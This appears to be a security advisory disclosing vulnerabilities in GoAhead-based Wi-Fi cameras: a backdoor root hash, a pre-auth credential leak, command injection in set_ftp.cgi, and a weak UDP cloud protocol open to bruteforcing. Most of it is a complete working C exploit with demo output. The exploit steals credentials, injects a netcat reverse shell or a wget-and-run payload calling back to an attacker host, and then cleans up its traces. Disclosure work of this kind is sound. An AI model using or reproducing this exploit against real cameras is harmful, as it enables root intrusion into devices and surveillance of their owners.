By default, telnetd is running on the camera.

    user@kali$ telnet 192.168.1.107
    Trying 192.168.1.107...
    Connected to 192.168.1.107.
    Escape character is '^]'.

    apk-link login: admin
    Password:

    telnet> q
    Connection closed.
    user@kali$


One backdoor account exists in the camera:

    root:$1$ybdHbPDn$ii9aEIFNiolBbM9QxW9mr0:0:0::/root:/bin/sh



## Details - RSA key and certificates

The `/system/www/pem/ck.pem` contains an Apple certificate with a
private RSA key:


    / # cat /system/www/pem/ck.pem
    Bag Attributes
        friendlyName: Apple Production IOS Push Services: com.app.camera
        localKeyID: 74 9E 29 D0 6A 47 1B 35 AD D4 68 6D 46 D8 E2 37 C8 DA A1 9D
    subject=/UID=com.app.camera/CN=Apple Production IOS Push Services:
com.app.camera/OU=SQ6NNPBE2K/C=US
    issuer=/C=US/O=Apple Inc./OU=Apple Worldwide Developer
Relations/CN=Apple Worldwide Developer Relations Certification
Authority
    -----BEGIN CERTIFICATE-----
    [...]
    -----END CERTIFICATE-----
    Bag Attributes
        friendlyName: andrew
        localKeyID: 74 9E 29 D0 6A 47 1B 35 AD D4 68 6D 46 D8 E2 37 C8 DA A1 9D
    Key Attributes: <No Attributes>
    -----BEGIN RSA PRIVATE KEY-----
    [...]
    -----END RSA PRIVATE KEY-----



## Details - Pre-Auth Info Leak (credentials) within the GoAhead http server

The HTTP interface is provided by GoAhead. It allows 2 kinds of authentication:

- - htdigest authentication OR
- - authentication using credentials in URI (`?loginuse=LOGIN&?loginpas=PASS`).


By default, the web directory contains symbolic links to configuration
files (`system.ini` and `system-b.ini` contain credentials):

    /tmp/web # ls -la *ini
    lrwxrwxrwx    1 root     0               25 Oct 27 02:11
factory.ini -> /system/param/factory.ini
    lrwxrwxrwx    1 root     0               30 Oct 27 02:11
factoryparam.ini -> /system/param/factoryparam.ini
    lrwxrwxrwx    1 root     0               23 Oct 27 02:11
network-b.ini -> /system/www/network.ini
    lrwxrwxrwx    1 root     0               23 Oct 27 02:11
network.ini -> /system/www/network.ini
    lrwxrwxrwx    1 root     0               22 Oct 27 02:11
system-b.ini -> /system/www/system.ini
    lrwxrwxrwx    1 root     0               22 Oct 27 02:11
system.ini -> /system/www/system.ini
    /tmp/web #

With valid credentials, an attacker can retrieve the configuration, as
shown below:

    user@kali$ wget -qO- 'http://admin:admin@192.168.1.107/system.ini'|xxd

    [...]
    000001d0: ffff ffff ffff ffff ffff ffff ffff ffff  ................
    000001e0: ffff ffff ffff ffff ffff ffff ffff ffff  ................
    000001f0: ffff ffff ffff ffff ffff ffff ffff ffff  ................
    00000200: ffff ffff ffff ffff ffff ffff ffff ffff  ................
    00000210: ffff ffff ffff ffff ffff ffff 7b6f 1158  ............{o.X
    00000220: 0000 0000 0100 0000 7469 6d65 2e6e 6973  ........time.nis
    00000230: 742e 676f 7600 0000 0000 0000 0000 0000  t.gov...........
    00000240: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    00000250: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    00000260: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    00000270: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    00000280: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    00000290: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    000002a0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    000002b0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    000002c0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    [...]
    00000640: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    00000650: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    00000660: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    00000670: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    00000680: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    00000690: 6164 6d69 6e00 0000 0000 0000 0000 0000  admin...........
    000006a0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    000006b0: 6164 6d69 6e00 0000 0000 0000 0000 0000  admin...........
    000006c0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    000006d0: 030a 0a0f 8000 0000 0101 0003 0002 0000  ................
    [...]
    user@kali$


To browse `.cgi` files, an attacker needs to authenticate too:

    user@kali$ wget -qO-
'http://192.168.1.107/get_params.cgi?loginuse=BAD_LOGIN&loginpas=BAD_PASS'
    var result="Auth Failed";
    user@kali$ wget -qO- 'http://192.168.1.107/get_params.cgi?loginuse&loginpas'
    var result="Auth Failed";

But it appears access to `.ini` files are not correctly checked. The
attacker can bypass the authentication
by providing an empty `loginuse` and an empty `loginpas` in the URI:

    user@kali$ wget -qO-
'http://192.168.1.107/system.ini?loginuse&loginpas'|xxd|less
    00000000: 5749 4649 4341 4d00 0000 0000 0000 0000  WIFICAM.........
    00000010: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    00000020: 0000 0100 0000 0000 0000 0000 0000 0000  ................
    [...]
    00000690: 6164 6d69 6e00 0000 0000 0000 0000 0000  admin...........
    000006a0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    000006b0: 6164 6d69 6e00 0000 0000 0000 0000 0000  admin...........
    [...]


A PoC is provided:

    ./expl 192.168.1.107 --get-config | xxd | grep 000003

    00000030: 6d53 6563 0a0a 5b2b 5d20 6279 7061 7373  mSec..[+] bypass
    00000300: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    00000310: 0000 0000 0000 0000 0000 0000 0a0a 0a0a  ................
    00000320: 0100 0000 0a03 0100 0000 0000 0000 0000  ................
    00000330: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    00000340: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    00000350: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    00000360: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    00000370: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    00000380: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    00000390: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    000003a0: 0000 0000 0000 0000 0000 6164 6d69 6e00  ..........admin.
    000003b0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    000003c0: 0000 0000 0000 0000 0000 6164 6d69 6e00  ..........admin.
    000003d0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    000003e0: 0000 0000 0000 0000 0000 030a 0a0f 8000  ................
    000003f0: 0000 0101 0003 0002 0000 0080 8080 8001  ................

This vulnerability allows an attacker to steal credentials, ftp
accounts and smtp accounts (email).



## Details - Authenticated RCE as root

A RCE exists in the ftp configuration CGI. This is well-documented as
shown https://jumpespjump.blogspot.de/2015/09/how-i-hacked-my-ip-camera-and-found.html
and https://www.pentestpartners.com/blog/hacking-the-aldi-ip-cctv-camera-part-2/
in several different camera models.

The partition `/` is mounted in Read-Only, so modifications are not
possible in this partition.

The command injection is located in in `set_ftp.cgi` (see `$(ftp x.com)`):

    http://192.168.1.107/set_ftp.cgi?next_url=ftp.htm&loginuse=admin&loginpas=admin&svr=192.168.1.1&port=21&user=ftp&pwd=$(ftp
x.com)ftp&dir=/&mode=PORT&upload_interval=0
    http://192.168.1.107/ftptest.cgi?next_url=test_ftp.htm&loginuse=admin&loginpas=admin

When doing a tcpdump, we can see the DNS resolution for x.com:

    00:00:00.151107 IP 192.168.1.107.33551 > 8.8.8.8.53: 40888+ A? x.com. (23)

so, `ftp x.com` is executed.

We can use the telnetd binary to start an authenticated-less telnetd access:

    user@kali$ wget -qO-
'http://192.168.1.107/set_ftp.cgi?next_url=ftp.htm&loginuse=admin&loginpas=admin&svr=192.168.1.1&port=21&user=ftp&pwd=$(telnetd
-p25 -l/bin/sh)&dir=/&mode=PORT&upload_interval=0'
    user@kali$ wget -qO-
'http://192.168.1.107/ftptest.cgi?next_url=test_ftp.htm&loginuse=admin&loginpas=admin'


Testing this will give us root account on port 25/tcp:

    user@kali$ telnet 192.168.1.107 25
    Trying 192.168.1.107...
    Connected to 192.168.1.107.
    Escape character is '^]'.

    / # id
    uid=0(root) gid=0
    / # uname -ap
    Linux apk-link 3.10.14 #5 PREEMPT Thu Sep 22 09:11:41 CST 2016
mips GNU/Linux
    / # mount
    rootfs on / type rootfs (rw)
    /dev/root on / type squashfs (ro,relatime)
    /proc on /proc type proc (rw,relatime)
    sysfs on /sys type sysfs (rw,relatime)
    tmpfs on /dev type tmpfs (rw,relatime,size=2048k)
    tmpfs on /tmp type tmpfs (rw,relatime,size=5120k)
    devpts on /dev/pts type devpts (rw,relatime,mode=600,ptmxmode=000)
    /dev/mtdblock3 on /system type jffs2 (rw,relatime)
    / #

`/etc` is in read-only. So, command injection must not write into
`/etc`. The injection is located in `/tmp/ftpupload.sh`:

    / # cat /tmp/ftpupload.sh
    /bin/ftp -n<<!
    open 192.168.1.1 21
    user ftp $(telnetd -l /bin/sh -p 25)ftp
    binary
    lcd /tmp
    put ftptest.txt
    close
    bye
    !
    / #



## Details - Pre-Auth RCE as root

By combining the Pre-Auth Info Leak within the GoAhead http server
vulnerability and then authenticated RCE as root, an attacker can
achieve a pre-auth RCE as root on a LAN or on the Internet.

An exploit is provided and can be used to get a root RCE with connect-back.

The exploit will:

1. extract the valid credentials by connecting to the remote GoAhead
HTTP server of the targeted camera
2. plant a connect-back with `nc`
3. execute the payload
4. the attacker will receive a root shell with netcat on a second terminal
5. clean the payload located in the configuration file


It affects 1250+ camera models.


Demo:

    user@kali$ gcc -Wall -o expl expl-goahead-camera.c && ./expl
192.168.1.107
    Camera 0day root RCE with connect-back @PierreKimSec

    Please run `nc -vlp 1337` on 192.168.1.1

    [+] bypassing auth ... done
        login = admin
        pass  = admin
    [+] planting payload ... done
    [+] executing payload ... done
    [+] cleaning payload ... done
    [+] cleaning payload ... done
    [+] enjoy your root shell on 192.168.1.1:1337
    user@kali$


On the second xterm:

    user@kali$ nc -lvp 1337
    listening on [any] 1337 ...
    192.168.1.107: inverse host lookup failed: Unknown host
    connect to [192.168.1.1] from (UNKNOWN) [192.168.1.107] 47968
    id
    uid=0(root) gid=0
    uname -ap
    Linux apk-link 3.10.14 #5 PREEMPT Thu Sep 22 09:11:41 CST 2016
mips GNU/Linux
    ps
    PID   USER     TIME   COMMAND
        1 root       0:01 {linuxrc} init
        2 root       0:00 [kthreadd]
        3 root       0:00 [ksoftirqd/0]
        5 root       0:00 [kworker/0:0H]
        6 root       0:00 [kworker/u2:0]
        7 root       0:00 [rcu_preempt]
        8 root       0:00 [rcu_bh]
        9 root       0:00 [rcu_sched]
       10 root       0:00 [watchdog/0]
       11 root       0:00 [khelper]
       12 root       0:00 [writeback]
       13 root       0:00 [bioset]
       14 root       0:00 [kblockd]
       15 root       0:00 [khubd]
       16 root       0:00 [kworker/0:1]
       17 root       0:00 [cfg80211]
       18 root       0:00 [rpciod]
       19 root       0:00 [kswapd0]
       20 root       0:00 [fsnotify_mark]
       21 root       0:00 [nfsiod]
       22 root       0:00 [crypto]
       36 root       0:00 [kworker/u2:1]
       39 root       0:00 [i2s_work_1]
       40 root       0:00 [i2s_codec_irq_w]
       41 root       0:00 [kworker/0:2]
       42 root       0:00 [deferwq]
       43 root       0:00 [kworker/0:1H]
       59 root       0:00 [jffs2_gcd_mtd3]
       61 root       0:00 telnetd
       69 root       0:00 /system/system/bin/wifidaemon
       70 root       0:00 /sbin/getty -L ttyS1 115200 vt100
       98 root       0:01 [RtmpTimerTask]
       99 root       0:00 [RtmpMlmeTask]
      100 root       0:00 [RtmpCmdQTask]
      101 root       0:00 [RtmpWscTask]
      148 root       1:19 /tmp/encoder
      164 root       0:00 [irq/37-isp]
      236 root       0:07 [apical_isp_fw_p]
     2330 root       0:00 sh -c /tmp/ftpupload.sh > /tmp/ftpret.txt
     2331 root       0:00 {exe} ash /tmp/ftpupload.sh
     2332 root       0:00 {exe} ash /tmp/ftpupload.sh
     2333 root       0:00 /bin/ftp -n
     2334 root       0:00 /bin/sh
     2439 root       0:00 ps


A working exploit is provided:


#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>


#define CAM_PORT 80
#define REMOTE_HOST "192.168.1.1"
#define REMOTE_PORT "1337"
#define PAYLOAD_0 "GET
/set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc%20"
REMOTE_HOST "+" REMOTE_PORT
"%20-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\r\n\r\n"
#define PAYLOAD_1 "GET
/ftptest.cgi?next_url=test_ftp.htm&loginuse=%s&loginpas=%s\r\n\r\n"
#define PAYLOAD_2 "GET
/set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=passpasspasspasspasspasspasspasspass&dir=/&mode=PORT&upload_interval=0\r\n\r\n"


#define ALTERNATIVE_PAYLOAD_zero0 "GET
/set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc+"
REMOTE_HOST "+" REMOTE_PORT
"+-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\r\n\r\n"
#define ALTERNATIVE_PAYLOAD_zero1 "GET
/set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(wget+http://"
REMOTE_HOST "/stufz&&./stuff)&dir=/&mode=PORT&upload_interval=0\r\n\r\n"

char *    creds(char  *argv,
                int   get_config);

int       rce(char    *argv,
              char    *id,
              char    attack[],
              char    desc[]);


int   main(int        argc,
           char       **argv,
           char       **envp)
{
  char                *id;

  printf("Camera 0day root RCE with connect-back @PierreKimSec\n\n");

  if (argc < 2)
  {
     printf("%s target\n", argv[0]);
     printf("%s target --get-config      will dump the configuration
and exit\n", argv[0]);
     return (1);
  }

  if (argc == 2)
    printf("Please run `nc -vlp %s` on %s\n\n", REMOTE_PORT, REMOTE_HOST);

  if (argc == 3 && !strcmp(argv[2], "--get-config"))
    id = creds(argv[1], 1);
  else
    id = creds(argv[1], 0);

  if (id == NULL)
  {
    printf("exploit failed\n");
    return (1);
  }
  printf("done\n");

  printf("    login = %s\n", id);
  printf("    pass  = %s\n", id + 32);

  if (!rce(argv[1], id, PAYLOAD_0, "planting"))
    printf("done\n");
  sleep(1);
  if (!rce(argv[1], id, PAYLOAD_1, "executing"))
    printf("done\n");
  if (!rce(argv[1], id, PAYLOAD_2, "cleaning"))
    printf("done\n");
  if (!rce(argv[1], id, PAYLOAD_1, "cleaning"))
    printf("done\n");

  printf("[+] enjoy your root shell on %s:%s\n", REMOTE_HOST, REMOTE_PORT);

  return (0);
}


char *    creds(char  *argv,
                int   get_config)
{
  int                 sock;
  int                 n;
  struct sockaddr_in  serv_addr;
  char                buf[8192] = { 0 };
  char                *out;
  char                *tmp;
  char                payload[] = "GET /system.ini?loginuse&loginpas
HTTP/1.0\r\n\r\n";
  int                 old_n;
  int                 n_total;


  sock = 0;
  n = 0;
  old_n = 0;
  n_total = 0;

  printf("[+] bypassing auth ... ");

  if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
  {
    printf("Error while creating socket\n");
    return (NULL);
  }

  memset(&serv_addr, '0', sizeof(serv_addr));
  serv_addr.sin_family = AF_INET;
  serv_addr.sin_port = htons(CAM_PORT);

  if (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0)
  {
    printf("Error while inet_pton\n");
    return (NULL);
  }

  if (connect(sock, (struct sockaddr *)&serv_addr , sizeof(serv_addr)) < 0)
  {
    printf("creds: connect failed\n");
    return (NULL);
  }

  if (send(sock, payload, strlen(payload) , 0) < 0)
  {
    printf("creds: send failed\n");
    return (NULL);
  }

  if (!(tmp = malloc(10 * 1024 * sizeof(char))))
    return (NULL);

  if (!(out = calloc(64, sizeof(char))))
    return (NULL);

  while ((n = recv(sock, buf, sizeof(buf), 0)) > 0)
  {
    n_total += n;
    if (n_total < 1024 * 10)
      memcpy(tmp + old_n, buf, n);
    if (n >= 0)
      old_n = n;
  }

  close(sock);

  /*
  [ HTTP HEADERS ]
  ...

  000????: 0000 0a0a 0a0a 01.. .... .... .... ....
                ^^^^ ^^^^ ^^
                Useful reference in the binary data
                in order to to find the positions of
                credentials
  ...
  ...
  0000690: 6164 6d69 6e00 0000 0000 0000 0000 0000  admin...........
  00006a0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
  00006b0: 6164 6d69 6e00 0000 0000 0000 0000 0000  admin...........
  00006c0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
  ...

  NOTE: reference can be too:
  000????: 0006 0606 0606 0100 000a .... .... ....

  Other method: parse everything, find the "admin" string and extract
the associated password
  by adding 31bytes after the address of 'a'[dmin].
  Works if the login is admin (seems to be this by default, but can be
changed by the user)
  */

  if (get_config)
  {
    for (unsigned int j = 0; j < n_total && j < 10 * 1024; j++)
      printf("%c", tmp[j]);
    exit (0);
  }


  for (unsigned int j = 50; j < 10 * 1024; j++)
  {
     if (tmp[j - 4] == 0x0a &&
         tmp[j - 3] == 0x0a &&
         tmp[j - 2] == 0x0a &&
         tmp[j - 1] == 0x0a &&
         tmp[j]     == 0x01)
     {
       if (j + 170 < 10 * 1024)
       {
         strcat(out, &tmp[j + 138]);
         strcat(out + 32 * sizeof(char), &tmp[j + 170]);
         free(tmp);

         return (out);
       }
     }
  }

  free(tmp);

  return (NULL);
}

int       rce(char    *argv,
              char    *id,
              char    attack[],
              char    desc[])
{
  int                 sock;
  struct sockaddr_in  serv_addr;
  char                *payload;

  if (!(payload = calloc(512, sizeof(char))))
    return (1);

  sock = 0;

  printf("[+] %s payload ... ", desc);

  if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
  {
    printf("Error while creating socket\n");
    return (1);
  }

  memset(&serv_addr, '0', sizeof(serv_addr));
  serv_addr.sin_family = AF_INET;
  serv_addr.sin_port = htons(CAM_PORT);

  if (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0)
  {
    printf("Error while inet_pton\n");
    return (1);
  }

  if (connect(sock, (struct sockaddr *)&serv_addr , sizeof(serv_addr)) < 0)
  {
    printf("rce: connect failed\n");
    return (1);
  }


  sprintf(payload, attack, id, id + 32);
  if (send(sock, payload, strlen(payload) , 0) < 0)
  {
    printf("rce: send failed\n");
    return (1);
  }

  return (0);
}

Alternatively, you can fetch it at
https://pierrekim.github.io/advisories/expl-goahead-camera.c.



## Details -- Misc - Streaming without authentication

An attacker can use the authenticated-less RTSP server running on the
camera on port `10554/tcp` to watch the streaming without
authentication.

    user@kali$ vlc rstp://192.168.1.107:10554/tcp/av0_1

And:

    user@kali$ vlc rstp://192.168.1.107:10554/tcp/av0_0



## Details -- Misc - "Cloud" (Aka Botnet)

By default, the camera uses a 'Cloud' functionality.

You can tcpdump the traffic of the camera, which is very scary:

    12:09:21.410947 IP 192.168.1.107.46958 > 8.8.8.8.53: 60806+ A?
openapi.xg.qq.com.gateway. (43)
    12:09:26.429697 IP 192.168.1.107.58156 > 202.96.134.33.53: 60806+
A? openapi.xg.qq.com.gateway. (43)
    12:09:31.450033 IP 192.168.1.107.41499 > 8.8.8.8.53: 28561+ A?
www.baidu.com. (31)
    12:09:35.128919 IP 192.168.1.107.13179 > 121.42.208.86.32100: UDP, length 48
    12:09:35.128932 IP 192.168.1.107.13179 > 54.221.213.97.32100: UDP, length 48
    12:09:35.128933 IP 192.168.1.107.13179 > 120.24.37.48.32100: UDP, length 48
    12:09:36.468849 IP 192.168.1.107.44185 > 202.96.134.33.53: 28561+
A? www.baidu.com. (31)
    12:09:41.488223 IP 192.168.1.107.41499 > 8.8.8.8.53: 28561+ A?
www.baidu.com. (31)
    12:09:46.507810 IP 192.168.1.107.44185 > 202.96.134.33.53: 28561+
A? www.baidu.com. (31)
    12:09:51.527501 IP 192.168.1.107.47793 > 8.8.8.8.53: 33930+ A?
www.baidu.com.gateway. (39)
    12:09:56.546854 IP 192.168.1.107.53618 > 202.96.134.33.53: 33930+
A? www.baidu.com.gateway. (39)
    12:10:01.566316 IP 192.168.1.107.47793 > 8.8.8.8.53: 33930+ A?
www.baidu.com.gateway. (39)
    12:10:06.575735 ARP, Request who-has 192.168.1.1 tell
192.168.1.107, length 46
    12:10:06.575750 ARP, Reply 192.168.1.1 is-at 00:e0:4c:51:55:ed, length 28
    12:10:06.585841 IP 192.168.1.107.53618 > 202.96.134.33.53: 33930+
A? www.baidu.com.gateway. (39)
    12:10:11.606030 IP 192.168.1.107.46252 > 8.8.8.8.53: 41046+ A?
time.nist.gov. (31)
    12:10:16.625044 IP 192.168.1.107.44109 > 202.96.134.33.53: 41046+
A? time.nist.gov. (31)
    12:10:19.214687 IP 192.168.1.107.13179 > 121.42.208.86.32100: UDP, length 48
    12:10:19.214700 IP 192.168.1.107.13179 > 54.221.213.97.32100: UDP, length 48
    12:10:19.214702 IP 192.168.1.107.13179 > 120.24.37.48.32100: UDP, length 48
    12:10:21.644397 IP 192.168.1.107.46252 > 8.8.8.8.53: 41046+ A?
time.nist.gov. (31)


The camera tries to resolve `www.baidu.com`, `openapi.xg.qq.com`,
contacts hardcoded IPs and hosts:

- - `121.42.208.86:32100/udp` (CN: Alibaba),
- - `54.221.213.97:32100/udp` (AWS US),
- - `120.24.37.48:32100/udp` (CN: Alibaba),
- - `www.baidu.com:80/tcp` (CN: Baidu).

It appears this is the 'Cloud' functionality, enabled by default. The
security of this functionality is not proven.


The provided Android application to manage my camera is
object.p2pwificam.client.apk
[https://play.google.com/store/apps/details?id=object.p2pwificam.client].

[please visit the HTML version at
https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html
to see the image]

Netcam 360 works too:

[please visit the HTML version at
https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html
to see the image]

It appears, the network protocol is very weak:

1. the camera contacts a remote server using UDP,
2. the application contacts a remote server using UDP,
3. the application sends a request to the remote server, asking if the
camera with the specific serial-number is online,
4. the server will reply by "camera doesn't exit", "camera is offline"
or "camera is online",
5. if the camera is online, a UDP tunnel is automaticaly established
between the application and the camera, using the Cloud server as a
relay.


### UDP tunnel:

    [Android Application] <===UDP===> Cloud server <===UDP===> [Camera]


Then, the UDP tunnel is used by the application to reach the camera:

1/ the client will send a HTTP request to the camera with the
credentials (still in clear-text)

    GET check_user.cgi?&loginuse=admin&loginpas=admin&user=admin&pwd=admin&

or

    GET /check_user.cgi?&loginuse=admin&loginpas=admin&user=admin&pwd=admin&


2/ the camera will reply by using HTTP over UDP whenever the
credentials are valid or invalid.

If the credentials are valid, the camera will reply:

    result= 0;

If the credentials are not valid, the camera will reply:

    result=-1


3/ if the credentials are valid, then the application will send HTTP
requests to .cgi files hosted by the camera by appending credentials
to the requests (`?loginuse=valid_user&loginpas=valid_pass`)




### Step 2 in detail:

If the authentication is OK, so it is alright to dump all the
configuration in cleartext!


[please visit the HTML version at
https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html
to see the image]


Note: this trace was done with one of the application listed below, to
be sure applications are sharing the same "cloud" network  (it appears
the daemon running on the camera doesn't strictly respect the HTTP
protocol - note the lack of `/` - but it works !).


If the authentication is not OK. The cameras answers:

    result=-1;

Due to the absence of checking, an attacker can simply bruteforce credentials.

[please visit the HTML version at
https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html
to see the image]



### Step 3 in detail:

The application sends:

    GET get_params.cgi?&loginuse=admin&loginpas=admin&user=admin&pwd=admin&

OR

    GET /get_params.cgi?&loginuse=admin&loginpas=admin&user=admin&pwd=admin&



The camera replies by sending all its configuration in clear-text:


    var now=1122211111;
    var dst_enable=0;
    var dst_time=0;
    var tz=0;
    var ntp_enable=1;
    var ntp_svr="time.nist.gov";
    var dhcpen=1;
    var ip="192.168.2.76";
    var mask="255.255.255.0";
    var gateway="192.168.2.1";
    var dns1="8.8.8.8";
    var dns2="192.168.2.1";
    var port=80;
    var nashost="";
    var nasport=0;
    var dev2_host="";
    var dev2_alias="";
    var dev2_user="";
    var dev2_pwd="";
    var dev2_port=0;
    var dev3_host="";
    var dev3_alias="";
    var dev3_user="";
    var dev3_pwd="";
    var dev3_port=0;
    var dev4_host="";
    var dev4_alias="";
    var dev4_user="";
    var dev4_pwd="";
    var dev4_port=0;
    var dev5_host="";
    var dev5_alias="";
    var dev5_user="";
    var dev5_pwd="";
    var dev5_port=0;
    var dev6_host="";
    var dev6_alias
    [...]
    var user1_name="";
    var user1_pwd="";
    var user2_name="wut";
    var user2_pwd="wut";
    var user3_name="admin";
    var user3_pwd="admin";
    [...]









This is interesting because an attacker can reach a camera only by
knowing a serial number. The UDP tunnel between the attacker and the
camera is established even if the attacker doesn't know the
credentials. It's useful to note the tunnel bypasses NAT and firewall,
allowing the attacker to reach internal cameras (if they are connected
to the Internet) and to bruteforce credentials.
Then, the attacker can just try to bruteforce credentials of the camera:

    GET /get_params.cgi?&loginuse=admin&loginpas=TEST&user=admin&pwd=TEST&




This protocol appears to be common to a lot of Android applications, ie:

- - object.p2pwificam.client
(https://play.google.com/store/apps/details?id=object.p2pwificam.client)
 (500.000 - 1.000.000 installations)
- - hsl.p2pipcam
(https://play.google.com/store/apps/details?id=hsl.p2pipcam) (100.000
- 500.000 installations)
- - object.liouzx.client
(https://play.google.com/store/apps/details?id=object.liouzx.client)
(100.000 - 500.000 installations)
- - object.lioupp.client
(https://play.google.com/store/apps/details?id=object.lioupp.client)
(100.000 - 500.000 installations)
- - com.g_zhang.myp2pcam
(https://play.google.com/store/apps/details?id=com.g_zhang.myp2pcam)
(100.000 - 500.000 installations)
- - object.aisaidezx.client
(https://play.google.com/store/apps/details?id=object.aisaidezx.client)
(50.000 - 100.000 installations)
- - hsl.cam360 (https://play.google.com/store/apps/details?id=hsl.cam360)
 (10.000 - 50.000 installations)
- - bravocam.p2pipcam
(https://play.google.com/store/apps/details?id=bravocam.p2pipcam)
(10.000 - 50.000 installations)
- - xcam.p2pipcam
(https://play.google.com/store/apps/details?id=xcam.p2pipcam) (10.000
- 50.000 installations)
- - snugcam.p2pipcam
(https://play.google.com/store/apps/details?id=snugcam.p2pipcam)
(10.000 - 50.000 installations)
- - myview.p2pipcam
(https://play.google.com/store/apps/details?id=myview.p2pipcam) (5.000
- 10.000 installations)
- - object.weimaisizx.client
(https://play.google.com/store/apps/details?id=object.weimaisizx.client)
(10.000 - 50.000 installations)
- - com.tutk.P2PCamLive.Pixord
(https://play.google.com/store/apps/details?id=com.tutk.P2PCamLive.Pixord)
(10.000 - 50.000 installations)
- - object.p2pnetwork.client
(https://play.google.com/store/apps/details?id=object.p2pnetwork.client)
(5.000 - 10.000 installations)

This list is very far from being complete.




So, I modified the original Android Application in order to try the
pre-auth Info-Leak vulnerability:



    k% ls -la
    total 14912
    drwx------ 2 nobody nogroup     100 Mar  7 08:27 .
    drwxrwxrwt 3 root   root        140 Mar  7 08:25 ..
    -rwx------ 1 nobody nogroup    2319 Mar  7 08:25 apktool
    -rwx------ 1 nobody nogroup 8488199 Mar  7 08:25 apktool.jar
    -rwx------ 1 nobody nogroup 6773051 Mar  7 08:25
object.p2pwificam.client.apk
    k% ./apktool d object.p2pwificam.client.apk
    I: Using Apktool 2.2.2 on object.p2pwificam.client.apk
    I: Loading resource table...
    I: Decoding AndroidManifest.xml with resources...
    S: WARNING: Could not write to $HOME (/nonexistent), using /tmp instead...
    S: Please be aware this is a volatile directory and frameworks
could go missing, please utilize --frame-path if the default storage
directory is unavailable
    I: Loading resource table from file:
/tmp/.local/share/apktool/framework/1.apk
    I: Regular manifest package...
    I: Decoding file-resources...
    I: Decoding values */* XMLs...
    I: Baksmaling classes.dex...
    I: Copying assets and libs...
    I: Copying unknown files...
    I: Copying original files...
    k%


I edit the library which manages all the custom HTTP requests.

One of the interesting string is `GET
/%sloginuse=%s&loginpas=%s&user=%s&pwd=%s`:

    k% xxd ./object.p2pwificam.client/lib/armeabi/libobject_jni.so

    0001f650: 3d3d 3d3d 3d3d 3d3d 0000 0000 4745 5420  ========....GET
    0001f660: 2f25 736c 6f67 696e 7573 653d 2573 266c  /%sloginuse=%s&l
    0001f670: 6f67 696e 7061 733d 2573 2675 7365 723d  oginpas=%s&user=
    0001f680: 2573 2670 7764 3d25 7326 0000 4449 443a  %s&pwd=%s&..DID:
    0001f690: 2025 732c 2063 6769 5f67 6574 5f63 6f6d   %s, cgi_get_com
    0001f6a0: 6d6f 6e3a 2025 7300 5050 5050 5f43 6f6e  mon: %s.PPPP_Con
    0001f6b0: 6e65 6374 2062 6567 696e 2e2e 2e25 7300  nect begin...%s.
    0001f6c0: 5050 5050 5f43 6f6e 6e65 6374 2066 6169  PPPP_Connect fai
    0001f6d0: 6c65 642e 2e20 2573 2072 6574 7572 6e3a  led.. %s return:
    0001f6e0: 2025 6400 5265 436f 6e6e 6563 7443 6f75   %d.ReConnectCou
    0001f6f0: 6e74 3a20 2564 0a00 5050 5050 5f43 6f6e  nt: %d..PPPP_Con
    0001f700: 6e65 6374 2073 7563 6365 7373 2e2e 2e6d  nect success...m
    0001f710: 5f68 5365 7373 696f 6e48 616e 646c 653a  _hSessionHandle:


After the modification:

    0001f650: 3d3d 3d3d 3d3d 3d3d 0000 0000 4745 5420  ========....GET
    0001f660: 2f73 7973 7465 6d2e 696e 693f 6c6f 6769  /system.ini?logi
    0001f670: 6e75 7365 266c 6f67 696e 7061 7373 2678  nuse&loginpass&x
    0001f680: 7878 7878 7878 7878 7826 0000 4449 443a  xxxxxxxxx&..DID:
    0001f690: 2025 732c 2063 6769 5f67 6574 5f63 6f6d   %s, cgi_get_com
    0001f6a0: 6d6f 6e3a 2025 7300 5050 5050 5f43 6f6e  mon: %s.PPPP_Con
